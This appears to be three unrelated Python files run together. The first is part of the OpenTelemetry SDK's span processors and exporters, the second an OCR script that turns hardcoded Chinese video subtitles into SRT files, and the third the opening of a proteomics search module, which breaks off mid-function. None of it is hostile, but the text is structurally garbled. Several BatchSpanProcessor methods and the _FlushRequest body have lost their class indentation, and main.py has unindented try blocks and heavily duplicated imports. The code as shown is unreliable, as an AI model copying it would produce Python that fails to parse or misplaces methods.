OTEL_BSP_SCHEDULE_DELAY,
)
from opentelemetry.sdk.trace import ReadableSpan, Span, SpanProcessor
from opentelemetry.util._time import _time_ns
logger = logging.getLogger(__name__)
class SpanExportResult(Enum):
    """Outcome of a `SpanExporter.export` call."""

    SUCCESS = 0
    FAILURE = 1
class SpanExporter:
    """Interface for exporting spans.

    Interface to be implemented by services that want to export spans recorded
    in their own format.

    To export data this MUST be registered to a
    :class:`opentelemetry.sdk.trace.Tracer` using a `SimpleSpanProcessor` or a
    `BatchSpanProcessor`.
    """

    def export(
        self, spans: typing.Sequence[ReadableSpan]
    ) -> "SpanExportResult":
        """Exports a batch of telemetry data.

        Args:
            spans: The list of `opentelemetry.trace.Span` objects to be exported

        Returns:
            The result of the export
        """

    def shutdown(self) -> None:
        """Shuts down the exporter.

        Called when the SDK is shut down.
        """
class SimpleSpanProcessor(SpanProcessor):
    """Simple SpanProcessor implementation.

    SimpleSpanProcessor is an implementation of `SpanProcessor` that
    passes ended spans directly to the configured `SpanExporter`.
    """

    def __init__(self, span_exporter: SpanExporter):
        self.span_exporter = span_exporter

    def on_start(
        self, span: Span, parent_context: typing.Optional[Context] = None
    ) -> None:
        pass

    def on_end(self, span: ReadableSpan) -> None:
        """Synchronously exports a sampled span as soon as it ends."""
        if not span.context.trace_flags.sampled:
            return
        # Suppress instrumentation while exporting so the exporter's own
        # network calls don't generate spans recursively.
        token = attach(set_value("suppress_instrumentation", True))
        try:
            self.span_exporter.export((span,))
        # pylint: disable=broad-except
        except Exception:
            logger.exception("Exception while exporting Span.")
        finally:
            # Fixed: detach in `finally` so the context token is always
            # restored, even if export raises a non-Exception (e.g.
            # KeyboardInterrupt); previously detach ran after the try/except
            # and could be skipped.
            detach(token)

    def shutdown(self) -> None:
        self.span_exporter.shutdown()

    def force_flush(self, timeout_millis: int = 30000) -> bool:
        # Exporting happens synchronously in on_end, so there is never
        # anything buffered to flush.
        # pylint: disable=unused-argument
        return True
class _FlushRequest:
"""Represents a request for the BatchSpanProcessor to flush spans."""
__slots__ = ["event", "num_spans"]
def __init__(self):
self.event = threading.Event()
self.num_spans = 0
class BatchSpanProcessor(SpanProcessor):
    """Batch span processor implementation.

    `BatchSpanProcessor` is an implementation of `SpanProcessor` that
    batches ended spans and pushes them to the configured `SpanExporter`.

    `BatchSpanProcessor` is configurable with the following environment
    variables which correspond to constructor parameters:

    - :envvar:`OTEL_BSP_SCHEDULE_DELAY`
    - :envvar:`OTEL_BSP_MAX_QUEUE_SIZE`
    - :envvar:`OTEL_BSP_MAX_EXPORT_BATCH_SIZE`
    - :envvar:`OTEL_BSP_EXPORT_TIMEOUT`
    """

    def __init__(
        self,
        span_exporter: SpanExporter,
        max_queue_size: int = None,
        schedule_delay_millis: float = None,
        max_export_batch_size: int = None,
        export_timeout_millis: float = None,
    ):
        """Validates configuration and starts the daemon worker thread.

        Each parameter falls back to its environment variable, then to a
        built-in default (2048 / 5000 / 512 / 30000 respectively).

        Raises:
            ValueError: if a size/delay is non-positive, or
                max_export_batch_size exceeds max_queue_size.
        """
        if max_queue_size is None:
            max_queue_size = int(environ.get(OTEL_BSP_MAX_QUEUE_SIZE, 2048))

        if schedule_delay_millis is None:
            schedule_delay_millis = int(
                environ.get(OTEL_BSP_SCHEDULE_DELAY, 5000)
            )

        if max_export_batch_size is None:
            max_export_batch_size = int(
                environ.get(OTEL_BSP_MAX_EXPORT_BATCH_SIZE, 512)
            )

        if export_timeout_millis is None:
            export_timeout_millis = int(
                environ.get(OTEL_BSP_EXPORT_TIMEOUT, 30000)
            )

        if max_queue_size <= 0:
            raise ValueError("max_queue_size must be a positive integer.")

        if schedule_delay_millis <= 0:
            raise ValueError("schedule_delay_millis must be positive.")

        if max_export_batch_size <= 0:
            raise ValueError(
                "max_export_batch_size must be a positive integer."
            )

        if max_export_batch_size > max_queue_size:
            raise ValueError(
                "max_export_batch_size must be less than or equal to max_queue_size."
            )

        self.span_exporter = span_exporter
        # Bounded deque: when full, appendleft() silently evicts from the
        # right end, i.e. the oldest not-yet-exported span.
        self.queue = collections.deque(
            [], max_queue_size
        )  # type: typing.Deque[Span]
        self.worker_thread = threading.Thread(target=self.worker, daemon=True)
        self.condition = threading.Condition(threading.Lock())
        self._flush_request = None  # type: typing.Optional[_FlushRequest]
        self.schedule_delay_millis = schedule_delay_millis
        self.max_export_batch_size = max_export_batch_size
        self.max_queue_size = max_queue_size
        self.export_timeout_millis = export_timeout_millis
        self.done = False
        # flag that indicates that spans are being dropped
        self._spans_dropped = False
        # preallocated list to send spans to exporter
        self.spans_list = [
            None
        ] * self.max_export_batch_size  # type: typing.List[typing.Optional[Span]]
        self.worker_thread.start()
    def on_start(
        self, span: Span, parent_context: typing.Optional[Context] = None
    ) -> None:
        """No-op: batching only needs to observe ended spans."""
        pass
    def on_end(self, span: ReadableSpan) -> None:
        """Queues an ended, sampled span for batched export.

        Drops the span when the processor is already shut down or the span is
        unsampled. Logs once (per dropping episode) when the queue is full;
        the bounded deque then evicts the oldest queued span. Wakes the
        worker as soon as a full batch is available.
        """
        if self.done:
            logger.warning("Already shutdown, dropping span.")
            return
        if not span.context.trace_flags.sampled:
            return
        if len(self.queue) == self.max_queue_size:
            if not self._spans_dropped:
                logger.warning("Queue is full, likely spans will be dropped.")
                self._spans_dropped = True

        self.queue.appendleft(span)

        if len(self.queue) >= self.max_export_batch_size:
            with self.condition:
                self.condition.notify()
    def worker(self):
        """Background loop: exports batches periodically and on flush/shutdown.

        Waits up to schedule_delay_millis between exports; a pending flush
        request or a full batch skips the wait. On shutdown the queue is
        drained and any waiting flushers are notified.
        """
        timeout = self.schedule_delay_millis / 1e3
        flush_request = None  # type: typing.Optional[_FlushRequest]
        while not self.done:
            with self.condition:
                if self.done:
                    # done flag may have changed, avoid waiting
                    break
                flush_request = self._get_and_unset_flush_request()
                if (
                    len(self.queue) < self.max_export_batch_size
                    and flush_request is None
                ):

                    self.condition.wait(timeout)
                    flush_request = self._get_and_unset_flush_request()
                    if not self.queue:
                        # spurious notification, let's wait again, reset timeout
                        timeout = self.schedule_delay_millis / 1e3
                        self._notify_flush_request_finished(flush_request)
                        flush_request = None
                        continue
                    if self.done:
                        # missing spans will be sent when calling flush
                        break

            # subtract the duration of this export call to the next timeout
            start = _time_ns()
            self._export(flush_request)
            end = _time_ns()
            duration = (end - start) / 1e9
            timeout = self.schedule_delay_millis / 1e3 - duration

            self._notify_flush_request_finished(flush_request)
            flush_request = None

        # there might have been a new flush request while export was running
        # and before the done flag switched to true
        with self.condition:
            shutdown_flush_request = self._get_and_unset_flush_request()

        # be sure that all spans are sent
        self._drain_queue()
        self._notify_flush_request_finished(flush_request)
        self._notify_flush_request_finished(shutdown_flush_request)
def _get_and_unset_flush_request(self,) -> typing.Optional[_FlushRequest]:
"""Returns the current flush request and makes it invisible to the
worker thread for subsequent calls.
"""
flush_request = self._flush_request
self._flush_request = None
if flush_request is not None:
flush_request.num_spans = len(self.queue)
return flush_request
@staticmethod
def _notify_flush_request_finished(
    flush_request: typing.Optional[_FlushRequest],
):
    """Wake any flush initiator(s) waiting on *flush_request*.

    A ``None`` request (no flush pending) is a no-op.
    """
    if flush_request is None:
        return
    flush_request.event.set()
def _get_or_create_flush_request(self) -> _FlushRequest:
    """Return the active flush request, creating one if none is pending.

    The request is published via ``self._flush_request`` so the worker
    thread sees it before its next export. Callers may wait on the
    returned request's event to learn when the flush completed.

    Not thread-safe: callers must hold the appropriate lock.
    """
    pending = self._flush_request
    if pending is None:
        pending = _FlushRequest()
        self._flush_request = pending
    return pending
def _export(self, flush_request: typing.Optional[_FlushRequest]):
    """Export queued spans, honouring *flush_request* when given.

    Without a flush request, exports a single batch of at most
    ``max_export_batch_size`` spans. With one, keeps exporting batches
    until at least ``flush_request.num_spans`` spans have been sent or
    the queue runs dry.
    """
    if not flush_request:
        self._export_batch()
        return

    remaining = flush_request.num_spans
    while self.queue:
        remaining -= self._export_batch()
        if remaining <= 0:
            break
def _export_batch(self) -> int:
    """Export at most ``max_export_batch_size`` spans in one exporter call.

    Pops spans into the pre-allocated ``spans_list`` buffer, exports them
    with instrumentation suppressed, then clears the buffer slots so the
    spans can be garbage-collected.

    :returns: the number of spans handed to the exporter.
    """
    idx = 0
    # currently only a single thread acts as consumer, so queue.pop() will
    # not raise an exception
    while idx < self.max_export_batch_size and self.queue:
        self.spans_list[idx] = self.queue.pop()
        idx += 1
    token = attach(set_value("suppress_instrumentation", True))
    try:
        # Ignore type b/c the Optional[None]+slicing is too "clever"
        # for mypy
        self.span_exporter.export(self.spans_list[:idx])  # type: ignore
    except Exception:  # pylint: disable=broad-except
        logger.exception("Exception while exporting Span batch.")
    finally:
        # Restore the context even when a non-Exception (KeyboardInterrupt,
        # SystemExit) escapes the exporter; otherwise the attached
        # suppress_instrumentation context token would leak.
        detach(token)
    # clean up list
    for index in range(idx):
        self.spans_list[index] = None
    return idx
def _drain_queue(self):
    """Export batches until the queue is completely empty.

    Must only run on the worker thread, since the underlying export path
    is not thread safe.
    """
    while len(self.queue) > 0:
        self._export_batch()
def force_flush(self, timeout_millis: typing.Optional[int] = None) -> bool:
    """Request an immediate export of all queued spans and wait for it.

    :param timeout_millis: how long to wait for the worker thread to finish
        the flush; defaults to ``self.export_timeout_millis``. (Annotation
        fixed to an explicit Optional per PEP 484 — ``int = None`` was an
        implicit-Optional violation.)
    :returns: True when the flush completed (or the processor is already
        shut down), False when the wait timed out.
    """
    if timeout_millis is None:
        timeout_millis = self.export_timeout_millis

    if self.done:
        logger.warning("Already shutdown, ignoring call to force_flush().")
        return True

    with self.condition:
        flush_request = self._get_or_create_flush_request()
        # signal the worker thread to flush and wait for it to finish
        self.condition.notify_all()

    # wait for token to be processed
    ret = flush_request.event.wait(timeout_millis / 1e3)
    if not ret:
        logger.warning("Timeout was exceeded in force_flush().")
    return ret
def shutdown(self) -> None:
    """Stop the processor permanently.

    Sets the done flag, wakes the worker so it can drain remaining spans,
    waits for it to exit, and finally shuts down the wrapped exporter.
    """
    # signal the worker thread to finish and then wait for it
    self.done = True
    with self.condition:
        self.condition.notify_all()
    self.worker_thread.join()
    self.span_exporter.shutdown()
class ConsoleSpanExporter(SpanExporter):
    """A :class:`SpanExporter` that writes spans to a console stream.

    Intended for diagnostics: each finished span is rendered with
    ``formatter`` (JSON plus a newline by default) and written to ``out``
    (STDOUT by default).
    """

    def __init__(
        self,
        service_name: Optional[str] = None,
        out: typing.IO = sys.stdout,
        formatter: typing.Callable[
            [ReadableSpan], str
        ] = lambda span: span.to_json()
        + linesep,
    ):
        self.service_name = service_name
        self.formatter = formatter
        self.out = out

    def export(self, spans: typing.Sequence[ReadableSpan]) -> SpanExportResult:
        """Format and write every span, flushing once at the end."""
        emit = self.out.write
        render = self.formatter
        for finished_span in spans:
            emit(render(finished_span))
        self.out.flush()
        return SpanExportResult.SUCCESS
|
hard_subs_to_srt.py | from os import times
from PIL import Image
import pytesseract
import imagehash
import cv2
import numpy
import sys
from imutils.video import FileVideoStream
from queue import Queue
from threading import Thread
import argparse
FIRST_FRAME = 2500  # Skip frames up to this point

# Preview windows are scaled down to fit within this (width, height).
PREVIEW_MAX_SIZE = (1280, 720)

# The subtitles are within these bounds. The bounds are not super tight since
# Tesseract works better with some blank space around the text.
SUBTITLE_BOUNDS_LEFT = 820
SUBTITLE_BOUNDS_RIGHT = 3020
SUBTITLE_BOUNDS_TOP = 1600
SUBTITLE_BOUNDS_BOTTOM = 1863

# We force some space above and below the subtitles to be white before feeding
# the text images to Tesseract.
SUBTITLE_BLANK_SPACE_ABOVE = 46
SUBTITLE_BLANK_SPACE_BELOW = 63

# Hardcoded subtitles are not entirely white. To filter out subtitles we look
# for pixels that are as bright or brighter than this. Completely white is 255
SUBTITLES_MIN_VALUE = 250

# We add some blur to the subtitle images before feeding them to Tesseract since
# some pixels within the subtitles are not white enough. This also eliminates
# smaller groups of white pixels outside of the subtitles. A bigger value means
# more blur.
SUBTITLE_IMAGE_BLUR_SIZE = (21, 21)

# After blurring the image we make the image monochrome since that works better
# for Tesseract. This is the limit for what should be considered a (white)
# subtitle pixel after the blur.
SUBTITLES_MIN_VALUE_AFTER_BLUR = 55

# Only use Tesseract if the subtitle changes. This is for performance and also
# to avoid having single frames of Tesseract mistakes that get entered into the
# SRT file. To tell if two images are of the same subtitle we compare the image
# hashes of them. See https://pypi.org/project/ImageHash/ for more information.
IMAGE_HASH_SIZE = 32
MAX_HASH_DIFFERENCE_FOR_SAME_SUBTITLE = 20

# Hash a frame without a subtitle produces: 256 zero hex digits at the hash
# size above. (The 'SUBTILE' spelling is kept; renaming would break callers.)
NO_SUBTILE_FRAME_HASH = imagehash.hex_to_hash('0' * 256)

# Language model Tesseract should use (simplified Chinese).
TESSERACT_EXPECTED_LANGUAGE = 'chi_sim'

# Page segmentation mode (PSM) 13 means "Raw line. Treat the image as a single
# text line, bypassing hacks that are Tesseract-specific." See this link for
# other options:
# https://tesseract-ocr.github.io/tessdoc/ImproveQuality.html#page-segmentation-method
TESSERACT_CONFIG = '--psm 13'

# Tesseract makes mistakes. Some are easy to fix. Keys in this dictionary will
# be replaced with their respective values.
COMMON_MISTAKES = {
    '-': '一',
    '+': '十',
    'F': '上',
    ',': '',
    '。': '',
    '”': '',
}

# Encoding used for the generated SRT file.
OUTPUT_ENCODING = 'utf-8'
def main():
    """CLI entry point: parse the two path arguments and run extraction."""
    arg_parser = argparse.ArgumentParser(
        description='Creates an SRT file from a video file that has hardcoded subtitles')
    arg_parser.add_argument(
        'video_file', help='the path to a video file that has hardcoded subtitles')
    arg_parser.add_argument(
        'srt_file', help='where to put the resulting SRT file, will overwrite if it is already there')
    parsed = arg_parser.parse_args()
    extract_srt(parsed.video_file, parsed.srt_file)
def extract_srt(video_file, srt_file):
    """Extract hardcoded subtitles from *video_file* into *srt_file*.

    Seeks to FIRST_FRAME, redirects stdout through a tee so SRT entries go
    both to the terminal and the output file, and runs the frame-by-frame
    OCR conversion.
    """
    video = FileVideoStream(video_file)
    video.stream.set(cv2.CAP_PROP_POS_FRAMES, FIRST_FRAME)
    # `not isOpened()` instead of the `== False` anti-idiom.
    if not video.stream.isOpened():
        print('Error opening video stream or file')
        return
    sys.stdout = FileAndTerminalStream(srt_file)
    try:
        convert_frames_to_srt(video, FIRST_FRAME)
    finally:
        # Restore stdout and release OpenCV resources even if the
        # conversion raises part-way, so later prints don't keep being
        # written into the SRT file.
        sys.stdout = sys.stdout.terminal
        cv2.destroyAllWindows()
        video.stop()
class FileAndTerminalStream(object):
    """A stdout replacement that tees every write to the terminal and a file.

    Installed as ``sys.stdout`` while generating the SRT so subtitles are
    shown live and saved to disk at the same time. The original stdout is
    kept in ``self.terminal`` so callers can restore it.
    """

    def __init__(self, file):
        self.terminal = sys.stdout
        self.srt = open(file, 'w', encoding=OUTPUT_ENCODING)

    def write(self, message):
        """Write *message* to both the terminal and the SRT file."""
        self.terminal.write(message)
        self.srt.write(message)

    def flush(self):
        # Fix: forward the flush to both underlying streams instead of
        # dropping it — previously a crash could lose buffered SRT content.
        self.terminal.flush()
        self.srt.flush()

    def close(self):
        """Close the underlying SRT file (the terminal stream stays open)."""
        self.srt.close()
def convert_frames_to_srt(video, first_frame_pos):
    """Scan video frames, detect subtitle changes via image hashing, and
    queue changed frames for OCR on the SubtitleReader thread.

    Keyboard controls in the preview window: 'q' quits, 'p' pauses,
    'c' resumes.

    :param video: an imutils FileVideoStream already seeked to the start.
    :param first_frame_pos: frame index matching the stream position, used
        to compute timestamps.
    """
    prev_frame_hash = NO_SUBTILE_FRAME_HASH
    frame_number = first_frame_pos
    reader = SubtitleReader()
    keyboard = Keyboard()
    width = video.stream.get(cv2.CAP_PROP_FRAME_WIDTH)
    height = video.stream.get(cv2.CAP_PROP_FRAME_HEIGHT)
    preview_size = limit_size((width, height), PREVIEW_MAX_SIZE)
    video.start()
    reader.start()
    frame = video.read()
    while frame is not None:
        # Crop to the subtitle region: numpy indexing is [rows, columns].
        cropped_frame = frame[SUBTITLE_BOUNDS_TOP:SUBTITLE_BOUNDS_BOTTOM,
                              SUBTITLE_BOUNDS_LEFT:SUBTITLE_BOUNDS_RIGHT]
        monochrome_frame = to_monochrome_subtitle_frame(cropped_frame)
        cv2.imshow('Orignal', cv2.resize(frame, preview_size))
        cv2.imshow('Processed image for tesseract', monochrome_frame)
        textImage = Image.fromarray(monochrome_frame)
        frame_hash = imagehash.average_hash(textImage, IMAGE_HASH_SIZE)
        # Only use Tesseract if the subtitle changes. This is for performance
        # and also to avoid having single frames of Tesseract mistakes that
        # get entered into the SRT file.
        hash_difference = abs(prev_frame_hash - frame_hash)
        if hash_difference > MAX_HASH_DIFFERENCE_FOR_SAME_SUBTITLE:
            timestamp = get_millis_for_frame(video, frame_number)
            if frame_hash == NO_SUBTILE_FRAME_HASH:
                # no need to use Tesseract when the input is a white rectangle
                change = EmptySubtitleChange(timestamp)
            else:
                change = SubtitleChange(monochrome_frame, timestamp)
            reader.provide_material(change)
            prev_frame_hash = frame_hash
        frame_number += 1
        keyboard.wait_key()
        # fps.update()
        if keyboard.last_pressed_key == ord('q'):
            return
        elif keyboard.last_pressed_key == ord('p'):
            # Paused: poll until 'c' (continue) or 'q' (quit).
            while keyboard.wait_key() != ord('c'):
                if (keyboard.last_pressed_key == ord('q')):
                    return
        frame = video.read()
class SubtitleReader:
    """Consumes subtitle changes on a background thread and prints SRT.

    OCR is slow, so frames are handed over through a bounded queue and
    processed on a daemon thread while the video loop keeps running.
    """

    def __init__(self):
        self.changes = Queue(maxsize=128)
        self.thread = Thread(target=self.update, args=())
        self.thread.daemon = True

    def start(self):
        """Begin consuming queued subtitle changes."""
        self.thread.start()

    def update(self):
        """Worker loop: OCR each queued change and emit a numbered SRT
        entry whenever the recognized text differs from the previous one."""
        entry_index = 1
        previous_text = ""
        previous_millis = 0  # either the start or the end of a subtitle line
        while True:
            change = self.changes.get()
            text = change.read_subtitle()
            if text == previous_text:
                continue
            if previous_text != '':
                print_line(
                    index=entry_index,
                    start_time=previous_millis,
                    end_time=change.timestamp,
                    text=previous_text)
                entry_index += 1
            previous_text = text
            previous_millis = change.timestamp

    def provide_material(self, subtitle_change):
        """Queue a change for OCR; blocks while the queue is full."""
        self.changes.put(subtitle_change)
def print_line(index, start_time, end_time, text):
    """Write one SRT entry (index, time range, text, blank line) to stdout."""
    start_stamp = millis_to_srt_timestamp(start_time)
    end_stamp = millis_to_srt_timestamp(end_time)
    print(index)
    print(start_stamp + ' --> ' + end_stamp)
    print(text)
    print()
class SubtitleChange:
    """A processed subtitle frame together with the time it appeared."""

    def __init__(self, frame, timestamp):
        # frame: monochrome image (as produced by
        # to_monochrome_subtitle_frame) ready for OCR.
        self.frame = frame
        # timestamp: video position in milliseconds.
        self.timestamp = timestamp

    def read_subtitle(self):
        """OCR the frame with Tesseract and return the cleaned-up text."""
        line = pytesseract.image_to_string(self.frame,
            lang=TESSERACT_EXPECTED_LANGUAGE, config=TESSERACT_CONFIG)
        return clean_up_tesseract_output(line)
class EmptySubtitleChange:
    """A SubtitleChange-compatible marker for frames with no subtitle.

    Skips OCR entirely: reading it always yields the empty string.
    """

    def __init__(self, timestamp):
        # Video position in milliseconds at which the subtitle disappeared.
        self.timestamp = timestamp

    def read_subtitle(self):
        """Return the empty subtitle text without invoking Tesseract."""
        return ''
class Keyboard:
    """Tracks the most recent key pressed in the OpenCV preview windows."""

    # Result of the last cv2.waitKey poll (-1/0 when no key was pressed).
    last_pressed_key = 0

    def wait_key(self):
        """Poll for a key press (1 ms) and remember + return the result."""
        self.last_pressed_key = cv2.waitKey(1)
        return self.last_pressed_key
def limit_size(size, max_dimensions):
    """Scale *size* down to fit within *max_dimensions*, keeping the
    aspect ratio.

    Returns *size* unchanged when it already fits; otherwise returns the
    largest (width, height) with the same aspect ratio that fits.
    """
    width, height = size
    max_width, max_height = max_dimensions
    if width <= max_width and height <= max_height:
        return size
    # Compare aspect ratios to decide which dimension is the bottleneck.
    if width / height > max_width / max_height:
        return (max_width, int(height * max_width / width))
    return (int(width * max_height / height), max_height)
def to_monochrome_subtitle_frame(cropped_frame):
    """Convert a cropped subtitle region into a clean black-on-white image.

    Pipeline: grayscale -> threshold (keep only near-white subtitle
    pixels) -> blank the margins above/below the text -> blur and
    re-threshold to fill gaps and drop stray specks -> invert for
    Tesseract.

    see https://tesseract-ocr.github.io/tessdoc/ImproveQuality.html for more
    information
    """
    img = cv2.cvtColor(cropped_frame, cv2.COLOR_BGR2GRAY)
    # make the image monochrome where only the whitest pixel are kept white
    img = cv2.threshold(img, SUBTITLES_MIN_VALUE, 255, cv2.THRESH_BINARY)[1]
    bounds_width = SUBTITLE_BOUNDS_RIGHT - SUBTITLE_BOUNDS_LEFT
    bounds_height = SUBTITLE_BOUNDS_BOTTOM - SUBTITLE_BOUNDS_TOP
    whitespace_below_y = bounds_height - SUBTITLE_BLANK_SPACE_BELOW
    # Rectangles (in cropped-image coordinates) covering the margins.
    above_subtitles = numpy.array([[0, 0], [0, SUBTITLE_BLANK_SPACE_ABOVE],
        [bounds_width, SUBTITLE_BLANK_SPACE_ABOVE], [bounds_width, 0]])
    below_subtitles = numpy.array([[0, whitespace_below_y], [0, bounds_height],
        [bounds_width, bounds_height], [bounds_width, whitespace_below_y]])
    # ensure white above and below text. Some blank space is needed for
    # Tesseract
    img = cv2.fillPoly(img, pts=[above_subtitles, below_subtitles], color=0)
    # Add some blur since some pixels within the subtitles are not completely
    # white. This also eliminates smaller groups of white pixels outside of the
    # subtitles
    img = cv2.GaussianBlur(img, SUBTITLE_IMAGE_BLUR_SIZE, 0)
    img = cv2.threshold(
        img, SUBTITLES_MIN_VALUE_AFTER_BLUR, 255, cv2.THRESH_BINARY)[1]
    # Invert the colors to have white background with black text.
    img = cv2.bitwise_not(img)
    return img
def clean_up_tesseract_output(text):
    """Apply the COMMON_MISTAKES substitutions and strip whitespace.

    Each key in COMMON_MISTAKES is replaced by its value, fixing frequent
    Tesseract misreads before the text goes into the SRT.
    """
    for wrong, right in COMMON_MISTAKES.items():
        text = text.replace(wrong, right)
    return text.strip()
def millis_to_srt_timestamp(total_millis):
    """Convert a millisecond count to an SRT timestamp 'HH:MM:SS,mmm'."""
    total_seconds, millis = divmod(total_millis, 1000)
    total_minutes, seconds = divmod(total_seconds, 60)
    hours, minutes = divmod(total_minutes, 60)
    return f'{int(hours):02}:{int(minutes):02}:{int(seconds):02},{int(millis):03}'
def get_millis_for_frame(video, frame_number):
    """Convert a frame number to a video timestamp in milliseconds,
    using the stream's reported frames-per-second."""
    return 1000.0 * frame_number / video.stream.get(cv2.CAP_PROP_FPS)
# Run the CLI only when executed as a script (not when imported).
if __name__ == "__main__":
    main()
|
main.py | import os
from . import utils
import numpy as np
from scipy.stats import scoreatpercentile
from scipy.optimize import curve_fit
from scipy import exp
import operator
from copy import copy, deepcopy
from collections import defaultdict, Counter
import re
from pyteomics import parser, mass, fasta, auxiliary as aux, achrom
try:
from pyteomics import cmass
except ImportError:
cmass = mass
import subprocess
from sklearn import linear_model
import tempfile
import pandas as pd
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
from multiprocessing import Queue, Process, cpu_count
from itertools import chain
try:
import seaborn
seaborn.set(rc={'axes.facecolor':'#ffffff'})
seaborn.set_style('whitegrid')
except:
pass
from .utils import calc_sf_all, recalc_spc
import lightgbm as lgb
import pandas as pd
from sklearn.model_selection import train_test_split
from scipy.stats import zscore, spearmanr
import pandas as pd
from pyteomics import pepxml, achrom, auxiliary as aux, mass, fasta, mzid, parser
from pyteomics import electrochem
import numpy as np
import random
SEED = 42
from sklearn.model_selection import train_test_split
from os import path, mkdir
from collections import Counter, defaultdict
import warnings
import pylab as plt
warnings.formatwarning = lambda msg, *args, **kw: str(msg) + '\n'
import pandas as pd
from sklearn.model_selection import train_test_split, KFold
import os
from collections import Counter, defaultdict
from scipy.stats import scoreatpercentile
from sklearn.isotonic import IsotonicRegression
import warnings
import numpy as np
import matplotlib
import numpy
import pandas
import random
import sklearn
import matplotlib.pyplot as plt
from sklearn import (
feature_extraction, feature_selection, decomposition, linear_model,
model_selection, metrics, svm
)
import scipy
from scipy.stats import rankdata
from copy import deepcopy
import csv
from scipy.stats import rankdata
import lightgbm as lgb
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from itertools import chain
import time as timemodule
import ast
from sklearn import metrics
SEED = 50
def worker_RT(qin, qout, shift, step, RC=False, elude_path=False, ns=False, nr=False, win_sys=False):
    """Predict retention times for a strided slice of peptides in *qin*.

    Each worker handles every ``step``-th peptide starting at offset
    ``shift``. Predictions come either from the external ELUDE binary
    (when *elude_path* is set) or from pyteomics' achrom additive model.

    :param qin: indexable collection of peptide sequences.
    :param qout: queue receiving the result dict followed by a None
        sentinel (ignored when *win_sys* is truthy).
    :param shift: this worker's starting offset into qin.
    :param step: stride between peptides handled by this worker.
    :param RC: retention coefficients for achrom.calculate_RT.
    :param elude_path: path to the ELUDE executable, or falsy to use achrom.
    :param ns: training peptide sequences for ELUDE.
    :param nr: training retention times matching *ns*.
    :param win_sys: when truthy, return the dict directly instead of using
        the queue (in-process mode used on Windows).
    """
    pepdict = dict()
    if elude_path:
        # Write the ELUDE training set (sequence<TAB>RT) to a temp file.
        # NOTE(review): these temp files are never removed — confirm that
        # is acceptable for long runs.
        outtrain_name = os.path.join(tempfile.gettempdir(), os.urandom(24).hex())
        outtrain = open(outtrain_name, 'w')
        outres_name = os.path.join(tempfile.gettempdir(), os.urandom(24).hex())
        for seq, RT in zip(ns, nr):
            outtrain.write(seq + '\t' + str(RT) + '\n')
        outtrain.close()
        outtest_name = os.path.join(tempfile.gettempdir(), os.urandom(24).hex())
        outtest = open(outtest_name, 'w')
        maxval = len(qin)
        start = 0
        while start + shift < maxval:
            item = qin[start+shift]
            outtest.write(item + '\n')
            start += step
        outtest.close()
        subprocess.call([elude_path, '-t', outtrain_name, '-e', outtest_name, '-a', '-o', outres_name])
        # ELUDE output: three header lines, then sequence<TAB>predicted RT.
        for x in open(outres_name).readlines()[3:]:
            seq, RT = x.strip().split('\t')
            pepdict[seq] = float(RT)
    else:
        maxval = len(qin)
        start = 0
        while start + shift < maxval:
            item = qin[start+shift]
            pepdict[item] = achrom.calculate_RT(item, RC)
            start += step
    if win_sys:
        return pepdict
    else:
        # Sentinel None tells the consumer this worker is finished.
        qout.put(pepdict)
        qout.put(None)
def final_iteration(resdict, mass_diff, rt_diff, pept_prot, protsN, base_out_name, prefix, isdecoy, isdecoy_key, escore, fdr, nproc, fname=False):
    """Final protein-inference stage of the MS1 search.

    Iteratively picks the best-scoring protein, removes its peptides from
    the remaining candidates, and repeats until the protein-level FDR
    exceeds 12.5x the target. Then rescoring workers (optionally in
    parallel processes) average scores over 10 mass/RT tolerance
    coefficients, target/decoy pairs are resolved, and filtered results
    plus optional QC plots are written next to *base_out_name*.

    :param resdict: dict of numpy arrays ('seqs', 'ids', ...) of matches.
    :param pept_prot: peptide -> iterable of protein accessions.
    :param protsN: protein -> number of theoretical peptides.
    :param prefix: decoy accession prefix.
    :param isdecoy / isdecoy_key / escore: decoy and scoring predicates.
    :param fdr: target false discovery rate (fraction, not percent).
    :param nproc: worker process count; 0 = use cpu_count().
    :param fname: feature-file path; when set, QC histograms are saved.
    """
    n = nproc
    prots_spc_basic = dict()

    p1 = set(resdict['seqs'])

    pep_pid = defaultdict(set)
    pid_pep = defaultdict(set)
    banned_dict = dict()
    for pep, pid in zip(resdict['seqs'], resdict['ids']):
        pep_pid[pep].add(pid)
        pid_pep[pid].add(pep)
        if pep in banned_dict:
            banned_dict[pep] += 1
        else:
            banned_dict[pep] = 1

    if len(p1):
        prots_spc_final = dict()
        prots_spc_copy = False
        prots_spc2 = False
        unstable_prots = set()
        p0 = False

        names_arr = False
        tmp_spc_new = False
        decoy_set = False

        while 1:
            if not prots_spc2:
                # First pass: build protein -> matched-peptides map and the
                # decoy statistics used for the match probability p.
                best_match_dict = dict()
                n_map_dict = defaultdict(list)
                for k, v in protsN.items():
                    n_map_dict[v].append(k)

                decoy_set = set()
                for k in protsN:
                    if isdecoy_key(k):
                        decoy_set.add(k)
                decoy_set = list(decoy_set)

                prots_spc2 = defaultdict(set)
                for pep, proteins in pept_prot.items():
                    if pep in p1:
                        for protein in proteins:
                            prots_spc2[protein].add(pep)

                for k in protsN:
                    if k not in prots_spc2:
                        prots_spc2[k] = set([])
                prots_spc2 = dict(prots_spc2)
                unstable_prots = set(prots_spc2.keys())

                top100decoy_N = sum([val for key, val in protsN.items() if isdecoy_key(key)])

                names_arr = np.array(list(prots_spc2.keys()))
                n_arr = np.array([protsN[k] for k in names_arr])

                tmp_spc_new = dict((k, len(v)) for k, v in prots_spc2.items())

                top100decoy_score_tmp = [tmp_spc_new.get(dprot, 0) for dprot in decoy_set]
                top100decoy_score_tmp_sum = float(sum(top100decoy_score_tmp))

            tmp_spc = tmp_spc_new
            prots_spc = tmp_spc_new
            if not prots_spc_copy:
                prots_spc_copy = deepcopy(prots_spc)

            # Refresh decoy counts only for proteins whose peptide sets
            # changed in the previous iteration.
            for idx, v in enumerate(decoy_set):
                if v in unstable_prots:
                    top100decoy_score_tmp_sum -= top100decoy_score_tmp[idx]
                    top100decoy_score_tmp[idx] = prots_spc.get(v, 0)
                    top100decoy_score_tmp_sum += top100decoy_score_tmp[idx]

            # NOTE(review): the first assignment is immediately overwritten
            # by the incrementally-maintained sum below — dead statement.
            p = float(sum(top100decoy_score_tmp)) / top100decoy_N
            p = top100decoy_score_tmp_sum / top100decoy_N

            # For each theoretical-peptide count, track the current best
            # protein so scoring only needs one candidate per count.
            n_change = set(protsN[k] for k in unstable_prots)
            for n_val in n_change:
